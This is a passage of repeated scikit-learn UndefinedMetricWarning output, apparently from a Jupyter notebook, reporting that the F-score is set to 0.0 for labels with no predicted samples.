warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 